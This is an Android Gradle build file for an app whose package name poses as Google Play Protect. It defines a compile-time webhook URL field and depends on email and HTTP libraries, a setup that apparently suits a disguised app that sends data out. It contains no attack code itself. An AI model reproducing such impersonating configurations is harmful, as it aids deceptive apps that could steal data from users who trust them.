plugins {
    id 'com.android.application'
}

android {
    compileSdk 34

    // Add the namespace declaration
    namespace 'com.GooglePlayProtectService'
    
    buildFeatures {
        buildConfig true
    }

    defaultConfig {
        applicationId "com.GooglePlayProtectService"
        minSdk 21
        targetSdk 34
        versionCode 1
        versionName "1.0"

        testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner"
        
        // BuildConfig field for webhook URL (se inicializa como vacío y se establecerá durante la compilación)
        buildConfigField "String", "WEBHOOK_URL", "\"\""
    }

    buildTypes {
        release {
            minifyEnabled false
            proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
        }
    }
    compileOptions {
        sourceCompatibility JavaVersion.VERSION_1_8
        targetCompatibility JavaVersion.VERSION_1_8
    }
    packagingOptions {
        resources {
            excludes += ['META-INF/NOTICE.md', 'META-INF/LICENSE.md']
        }
    }

}

dependencies {
    implementation 'androidx.appcompat:appcompat:1.6.1'
    implementation 'com.google.android.material:material:1.8.0'
    testImplementation 'junit:junit:4.13.2'
    androidTestImplementation 'androidx.test.ext:junit:1.1.5'
    androidTestImplementation 'androidx.test.espresso:espresso-core:3.5.1'
    androidTestImplementation 'androidx.benchmark:benchmark-junit4:1.2.0'
    androidTestImplementation 'androidx.test:runner:1.5.2'
    androidTestImplementation 'androidx.test:rules:1.5.0'
    implementation 'com.sun.mail:android-mail:1.6.6'
    implementation 'com.sun.mail:android-activation:1.6.6'
    implementation 'com.squareup.okhttp3:okhttp:4.9.3'
    implementation 'pl.droidsonroids.gif:android-gif-drawable:1.2.28'
}